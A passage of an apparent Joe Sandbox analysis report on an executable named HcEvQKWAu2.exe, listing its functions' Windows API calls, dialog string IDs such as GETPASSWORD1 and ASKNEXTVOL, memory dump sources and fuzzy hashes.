                                          • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00F8A275,?,?,00000800,?,00F8A23A,?,00F8755C), ref: 00F8BBC5
                                          • _wcslen.LIBCMT ref: 00F8BC3B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _wcslen$CurrentDirectory
                                          • String ID: UNC$\\?\
                                          • API String ID: 3341907918-253988292
                                          APIs
                                          • LoadBitmapW.USER32(00000065), ref: 00F9B6ED
                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00F9B712
                                          • DeleteObject.GDI32(00000000), ref: 00F9B744
                                          • DeleteObject.GDI32(00000000), ref: 00F9B767
                                            • Part of subcall function 00F9A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00F9B73D,00000066), ref: 00F9A6D5
                                            • Part of subcall function 00F9A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00F9B73D,00000066), ref: 00F9A6EC
                                            • Part of subcall function 00F9A6C2: LoadResource.KERNEL32(00000000,?,?,?,00F9B73D,00000066), ref: 00F9A703
                                            • Part of subcall function 00F9A6C2: LockResource.KERNEL32(00000000,?,?,?,00F9B73D,00000066), ref: 00F9A712
                                            • Part of subcall function 00F9A6C2: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00F9B73D,00000066), ref: 00F9A72D
                                            • Part of subcall function 00F9A6C2: GlobalLock.KERNEL32 ref: 00F9A73E
                                            • Part of subcall function 00F9A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00F9A762
                                            • Part of subcall function 00F9A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00F9A7A7
                                            • Part of subcall function 00F9A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00F9A7C6
                                            • Part of subcall function 00F9A6C2: GlobalFree.KERNEL32(00000000), ref: 00F9A7CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                          • String ID: ]
                                          • API String ID: 1797374341-3352871620
                                          APIs
                                            • Part of subcall function 00F81316: GetDlgItem.USER32(00000000,00003021), ref: 00F8135A
                                            • Part of subcall function 00F81316: SetWindowTextW.USER32(00000000,00FB35F4), ref: 00F81370
                                          • EndDialog.USER32(?,00000001), ref: 00F9D64B
                                          • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00F9D661
                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 00F9D675
                                          • SetDlgItemTextW.USER32(?,00000068), ref: 00F9D684
                                          Similarity
                                          • API ID: ItemText$DialogWindow
                                          • String ID: RENAMEDLG
                                          • API String ID: 445417207-3299779563
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00FA7E24,00000000,?,00FA7DC4,00000000,00FBC300,0000000C,00FA7F1B,00000000,00000002), ref: 00FA7E93
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FA7EA6
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00FA7E24,00000000,?,00FA7DC4,00000000,00FBC300,0000000C,00FA7F1B,00000000,00000002), ref: 00FA7EC9
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          APIs
                                            • Part of subcall function 00F9081B: GetSystemDirectoryW.KERNEL32(?,00000800,00FC81C8,?,00F8F2D8,Crypt32.dll,00000000,00F8F35C,?,?,00F8F33E,?,?,?,?), ref: 00F90836
                                            • Part of subcall function 00F9081B: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00F8F2D8,Crypt32.dll,00000000,00F8F35C,?,?,00F8F33E,?,?,?), ref: 00F90858
                                          • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00F8F2E4
                                          • GetProcAddress.KERNEL32(00FC81C8,CryptUnprotectMemory), ref: 00F8F2F4
                                          Similarity
                                          • API ID: AddressProc$DirectoryLibraryLoadSystem
                                          • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                          • API String ID: 2141747552-1753850145
                                          APIs
                                          Similarity
                                          • API ID: AdjustPointer$_abort
                                          • String ID:
                                          • API String ID: 2252061734-0
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 00FABF39
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FABF5C
                                            • Part of subcall function 00FA8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FACA2C,00000000,?,00FA6CBE,?,00000008,?,00FA91E0,?,?,?), ref: 00FA8E38
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00FABF82
                                          • _free.LIBCMT ref: 00FABF95
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FABFA4
                                          Similarity
                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                          • String ID:
                                          • API String ID: 336800556-0
                                          APIs
                                          • GetLastError.KERNEL32(?,00FC1030,00000200,00FA91AD,00FA617E,?,?,?,?,00F8D984,?,?,?,00000004,00F8D710,?), ref: 00FA986E
                                          • _free.LIBCMT ref: 00FA98A3
                                          • _free.LIBCMT ref: 00FA98CA
                                          • SetLastError.KERNEL32(00000000,00FB3A34,00000050,00FC1030), ref: 00FA98D7
                                          • SetLastError.KERNEL32(00000000,00FB3A34,00000050,00FC1030), ref: 00FA98E0
                                          Similarity
                                          • API ID: ErrorLast$_free
                                          • String ID:
                                          • API String ID: 3170660625-0
                                          APIs
                                            • Part of subcall function 00F911CF: ResetEvent.KERNEL32(?), ref: 00F911E1
                                            • Part of subcall function 00F911CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00F911F5
                                          • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00F90F21
                                          • CloseHandle.KERNEL32(?,?), ref: 00F90F3B
                                          • DeleteCriticalSection.KERNEL32(?), ref: 00F90F54
                                          • CloseHandle.KERNEL32(?), ref: 00F90F60
                                          • CloseHandle.KERNEL32(?), ref: 00F90F6C
                                            • Part of subcall function 00F90FE4: WaitForSingleObject.KERNEL32(?,000000FF,00F91206,?), ref: 00F90FEA
                                            • Part of subcall function 00F90FE4: GetLastError.KERNEL32(?), ref: 00F90FF6
                                          Similarity
                                          • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                          • String ID:
                                          • API String ID: 1868215902-0
                                          APIs
                                          • _free.LIBCMT ref: 00FAC817
                                            • Part of subcall function 00FA8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FAC896,00FB3A34,00000000,00FB3A34,00000000,?,00FAC8BD,00FB3A34,00000007,00FB3A34,?,00FACCBA,00FB3A34), ref: 00FA8DE2
                                            • Part of subcall function 00FA8DCC: GetLastError.KERNEL32(00FB3A34,?,00FAC896,00FB3A34,00000000,00FB3A34,00000000,?,00FAC8BD,00FB3A34,00000007,00FB3A34,?,00FACCBA,00FB3A34,00FB3A34), ref: 00FA8DF4
                                          • _free.LIBCMT ref: 00FAC829
                                          • _free.LIBCMT ref: 00FAC83B
                                          • _free.LIBCMT ref: 00FAC84D
                                          • _free.LIBCMT ref: 00FAC85F
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          APIs
                                          • _wcslen.LIBCMT ref: 00F91FE5
                                          • _wcslen.LIBCMT ref: 00F91FF6
                                          • _wcslen.LIBCMT ref: 00F92006
                                          • _wcslen.LIBCMT ref: 00F92014
                                          • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00F8B371,?,?,00000000,?,?,?), ref: 00F9202F
                                          Similarity
                                          • API ID: _wcslen$CompareString
                                          • String ID:
                                          • API String ID: 3397213944-0
                                          APIs
                                          • _free.LIBCMT ref: 00FA891E
                                            • Part of subcall function 00FA8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FAC896,00FB3A34,00000000,00FB3A34,00000000,?,00FAC8BD,00FB3A34,00000007,00FB3A34,?,00FACCBA,00FB3A34), ref: 00FA8DE2
                                            • Part of subcall function 00FA8DCC: GetLastError.KERNEL32(00FB3A34,?,00FAC896,00FB3A34,00000000,00FB3A34,00000000,?,00FAC8BD,00FB3A34,00000007,00FB3A34,?,00FACCBA,00FB3A34,00FB3A34), ref: 00FA8DF4
                                          • _free.LIBCMT ref: 00FA8930
                                          • _free.LIBCMT ref: 00FA8943
                                          • _free.LIBCMT ref: 00FA8954
                                          • _free.LIBCMT ref: 00FA8965
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          APIs
                                          Similarity
                                          • API ID: _swprintf
                                          • String ID: %ls$%s: %s
                                          • API String ID: 589789837-2259941744
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\HcEvQKWAu2.exe,00000104), ref: 00FA7FAE
                                          • _free.LIBCMT ref: 00FA8079
                                          • _free.LIBCMT ref: 00FA8083
                                          Similarity
                                          • API ID: _free$FileModuleName
                                          • String ID: C:\Users\user\Desktop\HcEvQKWAu2.exe
                                          • API String ID: 2506810119-344686266
                                          • Opcode ID: 95839b180cdc12eaf24b2a4b58ae2fd4ecb98a83e378e6ef79f707601bde21d3
                                          • Instruction ID: c05103abb0a9a44d5ae61b6b82d8722763b6780056a55b849d11f20e2990fd5b
                                          • Opcode Fuzzy Hash: 95839b180cdc12eaf24b2a4b58ae2fd4ecb98a83e378e6ef79f707601bde21d3
                                          • Instruction Fuzzy Hash: FA31A2F1A04248AFCB21EF99DC81D9EBBBCEB86350F108166F40497211DAB08E45EB51
                                          APIs
                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00FA31FB
                                          • _abort.LIBCMT ref: 00FA3306
                                          Strings
                                          Similarity
                                          • API ID: EncodePointer_abort
                                          • String ID: MOC$RCC
                                          • API String ID: 948111806-2084237596
                                          • Opcode ID: eaeb697b6a66cc9b7d1b7ca4000b889d28e2c6aa5f5e70d31c605072efcf90a6
                                          • Instruction ID: e19989ee0065045e6e4782803cfd3df552dbeae42f912d086fb86eba396fbfd1
                                          • Opcode Fuzzy Hash: eaeb697b6a66cc9b7d1b7ca4000b889d28e2c6aa5f5e70d31c605072efcf90a6
                                          • Instruction Fuzzy Hash: EE4148B1D00209AFCF15DF98CD81AEEBBB5BF4A314F198159F904A7211D739AA50EB50
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F87406
                                            • Part of subcall function 00F83BBA: __EH_prolog.LIBCMT ref: 00F83BBF
                                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00F874CD
                                            • Part of subcall function 00F87A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F87AAB
                                            • Part of subcall function 00F87A9C: GetLastError.KERNEL32 ref: 00F87AF1
                                            • Part of subcall function 00F87A9C: CloseHandle.KERNEL32(?), ref: 00F87B00
                                          Strings
                                          Similarity
                                          • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                          • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                          • API String ID: 3813983858-639343689
                                          • Opcode ID: 618c71d4379e727fda297f7b9080eebb2c0fc4a7a330a460aa9a31d4263073d4
                                          • Instruction ID: 75d27ebad34c81263fcc8dd97f6c88a5aabdfaecf9d5d380779b9628af3d4647
                                          • Opcode Fuzzy Hash: 618c71d4379e727fda297f7b9080eebb2c0fc4a7a330a460aa9a31d4263073d4
                                          • Instruction Fuzzy Hash: CA31D471E04348AAEF11FBA4CC45FEE7BA9BF05314F144015F405AB292CB789A44EB61
                                          APIs
                                            • Part of subcall function 00F81316: GetDlgItem.USER32(00000000,00003021), ref: 00F8135A
                                            • Part of subcall function 00F81316: SetWindowTextW.USER32(00000000,00FB35F4), ref: 00F81370
                                          • EndDialog.USER32(?,00000001), ref: 00F9AD98
                                          • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00F9ADAD
                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 00F9ADC2
                                          Strings
                                          Similarity
                                          • API ID: ItemText$DialogWindow
                                          • String ID: ASKNEXTVOL
                                          • API String ID: 445417207-3402441367
                                          • Opcode ID: 62f0f56b70a886ff7e8654eecac45ac1992f7c9ee873dd70974f72a7b132d1e4
                                          • Instruction ID: 536e9dab993fe3b8791e3eb26d05ead32b481c1632ea2bffe1f9318aca2a6741
                                          • Opcode Fuzzy Hash: 62f0f56b70a886ff7e8654eecac45ac1992f7c9ee873dd70974f72a7b132d1e4
                                          • Instruction Fuzzy Hash: 9811D332A40214AFEB219F68DC89FAA3769FB4A752F100402F241DB4A0C7629945B7A2
                                          APIs
                                          • __fprintf_l.LIBCMT ref: 00F8D954
                                          • _strncpy.LIBCMT ref: 00F8D99A
                                            • Part of subcall function 00F91DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00FC1030,00000200,00F8D928,00000000,?,00000050,00FC1030), ref: 00F91DC4
                                          Strings
                                          Similarity
                                          • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                          • String ID: $%s$@%s
                                          • API String ID: 562999700-834177443
                                          • Opcode ID: 235793435fd0a283e8a539f05213e641999b48d255cadfa7364efc06a35acd0b
                                          • Instruction ID: d8ab215f35ea5b44d81ccef06263d23566b7f2dd1cb3c9759d2d183684e3565c
                                          • Opcode Fuzzy Hash: 235793435fd0a283e8a539f05213e641999b48d255cadfa7364efc06a35acd0b
                                          • Instruction Fuzzy Hash: DF216072840248AEEF21EEA4CC06FEE7BACAF05714F140522F910961E2E675D658EF51
                                          APIs
                                          • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00F8AC5A,00000008,?,00000000,?,00F8D22D,?,00000000), ref: 00F90E85
                                          • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00F8AC5A,00000008,?,00000000,?,00F8D22D,?,00000000), ref: 00F90E8F
                                          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00F8AC5A,00000008,?,00000000,?,00F8D22D,?,00000000), ref: 00F90E9F
                                          Strings
                                          • Thread pool initialization failed., xrefs: 00F90EB7
                                          Similarity
                                          • API ID: Create$CriticalEventInitializeSectionSemaphore
                                          • String ID: Thread pool initialization failed.
                                          • API String ID: 3340455307-2182114853
                                          • Opcode ID: 533559ff05033480b03399b765f53e44d41c9c6d51b9b7d3a0e500abfb7f9b04
                                          • Instruction ID: 0199180982d1cf2d23a4b289eccf8c1a388872c83931c400812f1600907d5aa7
                                          • Opcode Fuzzy Hash: 533559ff05033480b03399b765f53e44d41c9c6d51b9b7d3a0e500abfb7f9b04
                                          • Instruction Fuzzy Hash: 3D1191B1A407089FD3216F66DD84AA7FBECEB55754F14482EF1DAC2201DA719940AB50
                                          APIs
                                            • Part of subcall function 00F81316: GetDlgItem.USER32(00000000,00003021), ref: 00F8135A
                                            • Part of subcall function 00F81316: SetWindowTextW.USER32(00000000,00FB35F4), ref: 00F81370
                                          • EndDialog.USER32(?,00000001), ref: 00F9B2BE
                                          • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00F9B2D6
                                          • SetDlgItemTextW.USER32(?,00000067,?), ref: 00F9B304
                                          Strings
                                          Similarity
                                          • API ID: ItemText$DialogWindow
                                          • String ID: GETPASSWORD1
                                          • API String ID: 445417207-3292211884
                                          • Opcode ID: 11d5c5955187d2e6701fa3496093b05f08b23ecdb02213348711e28979b25339
                                          • Instruction ID: f57e83b5b35c74c7014e47d62ead32a5b1c6f57ce796d9dfe318be9304a11991
                                          • Opcode Fuzzy Hash: 11d5c5955187d2e6701fa3496093b05f08b23ecdb02213348711e28979b25339
                                          • Instruction Fuzzy Hash: 8211A5329001297AEF22AF64AE4DFFE376CEB1A750F000021FA45B7180C7A49A45B761
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: RENAMEDLG$REPLACEFILEDLG
                                          • API String ID: 0-56093855
                                          • Opcode ID: fb457fc91445bdc1263d6dc632620cd80f7c157884bba1d4282c8c0b994d9bc0
                                          • Instruction ID: a24a90cc96e19001c68102476771459a5a061d4f513780535a34b9d95954e738
                                          • Opcode Fuzzy Hash: fb457fc91445bdc1263d6dc632620cd80f7c157884bba1d4282c8c0b994d9bc0
                                          • Instruction Fuzzy Hash: E9019E76E04249AFEF149F65ED49E963BA9F709394B200026F90583231C6319850FBA0
                                          APIs
                                          Similarity
                                          • API ID: __alldvrm$_strrchr
                                          • String ID:
                                          • API String ID: 1036877536-0
                                          • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                          • Instruction ID: 4161faf5f0ebd6b237cfed243dbd3e6ad95021a89548517bafa6614a8946ab38
                                          • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                          • Instruction Fuzzy Hash: A6A15AB2E087869FEB21CF18C8917AEBBE5EF57360F14417DE4859B281C2B89D41E750
                                          APIs
                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00F87F69,?,?,?), ref: 00F8A3FA
                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00F87F69,?), ref: 00F8A43E
                                          • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00F87F69,?,?,?,?,?,?,?), ref: 00F8A4BF
                                          • CloseHandle.KERNEL32(?,?,?,00000800,?,00F87F69,?,?,?,?,?,?,?,?,?,?), ref: 00F8A4C6
                                          Similarity
                                          • API ID: File$Create$CloseHandleTime
                                          • String ID:
                                          • API String ID: 2287278272-0
                                          • Opcode ID: fe632c9699725f83f085d1f470372d281ab4eecda0a62064506eab4adac7d995
                                          • Instruction ID: efd79be909bd1dc02bb0c5ad315e89045a7321ac95ec721366380d8f9721e274
                                          • Opcode Fuzzy Hash: fe632c9699725f83f085d1f470372d281ab4eecda0a62064506eab4adac7d995
                                          • Instruction Fuzzy Hash: F941C1316883819AEB31EF24DC45FEEBBE4EF85310F04091EB5D193191D6A99A48EB53
                                          APIs
                                          Similarity
                                          • API ID: _wcslen
                                          • String ID:
                                          • API String ID: 176396367-0
                                          • Opcode ID: f98838220e7f1aec3779be71f376853ae814f490dfe8d41498fc9b7c25d9778e
                                          • Instruction ID: c9d797123268473f30826f744df956e92cbb2a3f3ad8ed5281f383eec3c60cb5
                                          • Opcode Fuzzy Hash: f98838220e7f1aec3779be71f376853ae814f490dfe8d41498fc9b7c25d9778e
                                          • Instruction Fuzzy Hash: FC41A5719006699BDB21AF688C4A9EF7BBCEF01320F000129FD45F7255DF34AE599BA4
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00FA91E0,?,00000000,?,00000001,?,?,00000001,00FA91E0,?), ref: 00FAC9D5
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FACA5E
                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00FA6CBE,?), ref: 00FACA70
                                          • __freea.LIBCMT ref: 00FACA79
                                            • Part of subcall function 00FA8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FACA2C,00000000,?,00FA6CBE,?,00000008,?,00FA91E0,?,?,?), ref: 00FA8E38
                                          Similarity
                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                          • String ID:
                                          • API String ID: 2652629310-0
                                          • Opcode ID: df1157e856f2cb6e4cab9450c1ef8c31eddf4d5f4500db3382782a54b763dba8
                                          • Instruction ID: 2d01c36e03a5635e3708fae0107a51d0a17e18a32b7aea6b149932e5c6f46ac2
                                          • Opcode Fuzzy Hash: df1157e856f2cb6e4cab9450c1ef8c31eddf4d5f4500db3382782a54b763dba8
                                          • Instruction Fuzzy Hash: 5531B2B2A0020AABDF24DF65CC95DFE7BA5EB42320B144228FC14E6250E739DD50EBD0
                                          APIs
                                          • GetDC.USER32(00000000), ref: 00F9A666
                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F9A675
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F9A683
                                          • ReleaseDC.USER32(00000000,00000000), ref: 00F9A691
                                          Similarity
                                          • API ID: CapsDevice$Release
                                          • String ID:
                                          • API String ID: 1035833867-0
                                          • Opcode ID: 8a600a290acae9a57c7c194a318fdd6be2778543c670fa73dd4505d222a9fb8f
                                          • Instruction ID: fde0651812eed21b41d1fb13133a1ef9cf191122707b4fe1d850e38b40a62bfe
                                          • Opcode Fuzzy Hash: 8a600a290acae9a57c7c194a318fdd6be2778543c670fa73dd4505d222a9fb8f
                                          • Instruction Fuzzy Hash: F6E0C231942B65B7D3609B60BC4EF8B3E14AB05BA7F010110FB059F1D0DB748600ABE0
                                          APIs
                                            • Part of subcall function 00F9A699: GetDC.USER32(00000000), ref: 00F9A69D
                                            • Part of subcall function 00F9A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F9A6A8
                                            • Part of subcall function 00F9A699: ReleaseDC.USER32(00000000,00000000), ref: 00F9A6B3
                                          • GetObjectW.GDI32(?,00000018,?), ref: 00F9A83C
                                            • Part of subcall function 00F9AAC9: GetDC.USER32(00000000), ref: 00F9AAD2
                                            • Part of subcall function 00F9AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00F9AB01
                                            • Part of subcall function 00F9AAC9: ReleaseDC.USER32(00000000,?), ref: 00F9AB99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ObjectRelease$CapsDevice
                                          • String ID: (
                                          • API String ID: 1061551593-3887548279
                                          • Opcode ID: a9373792f81b6fd44a055f73516eb2fdba168b407ada0b89c6b92507fc05c40f
                                          • Instruction ID: 268dbb923b5dbf1f74b2c773024f6a5495c01953fea701d4fc58c1ad6f0b1104
                                          • Opcode Fuzzy Hash: a9373792f81b6fd44a055f73516eb2fdba168b407ada0b89c6b92507fc05c40f
                                          • Instruction Fuzzy Hash: 1491E271604354AFEA11DF25C888A2BBBE8FFC9714F00491EF596D7260DB30A905DFA2
                                          APIs
                                          • _free.LIBCMT ref: 00FAB324
                                            • Part of subcall function 00FA9097: IsProcessorFeaturePresent.KERNEL32(00000017,00FA9086,00000050,00FB3A34,?,00F8D710,00000004,00FC1030,?,?,00FA9093,00000000,00000000,00000000,00000000,00000000), ref: 00FA9099
                                            • Part of subcall function 00FA9097: GetCurrentProcess.KERNEL32(C0000417,00FB3A34,00000050,00FC1030), ref: 00FA90BB
                                            • Part of subcall function 00FA9097: TerminateProcess.KERNEL32(00000000), ref: 00FA90C2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                          • String ID: *?$.
                                          • API String ID: 2667617558-3972193922
                                          • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                          • Instruction ID: c5693ae16dc543b71960971623d64d464a644d595da7cc02df21ba6039733bac
                                          • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                          • Instruction Fuzzy Hash: 005181B1E0020AAFDF15DFA8CC81AADBBF5EF59310F24816AE854E7341E7759E019B50
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F875E3
                                            • Part of subcall function 00F905DA: _wcslen.LIBCMT ref: 00F905E0
                                            • Part of subcall function 00F8A56D: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 00F8A598
                                          • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F8777F
                                            • Part of subcall function 00F8A4ED: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,00F8A325,?,?,?,00F8A175,?,00000001,00000000,?,?), ref: 00F8A501
                                            • Part of subcall function 00F8A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F8A325,?,?,?,00F8A175,?,00000001,00000000,?,?), ref: 00F8A532
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                          • String ID: :
                                          • API String ID: 3226429890-336475711
                                          • Opcode ID: 808614c0139e7998e8ce2530200c8878dcb90d86a43edac8c75d1a4868632537
                                          • Instruction ID: 2f085b497ac5bdf021911c4a23fe976b2a8bc9930ce5e685e590ea050f5e122d
                                          • Opcode Fuzzy Hash: 808614c0139e7998e8ce2530200c8878dcb90d86a43edac8c75d1a4868632537
                                          • Instruction Fuzzy Hash: DA417271804258A9EF25FB64CC5AEEEB77CEF45300F144096B605A7092DB789F88EF61
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
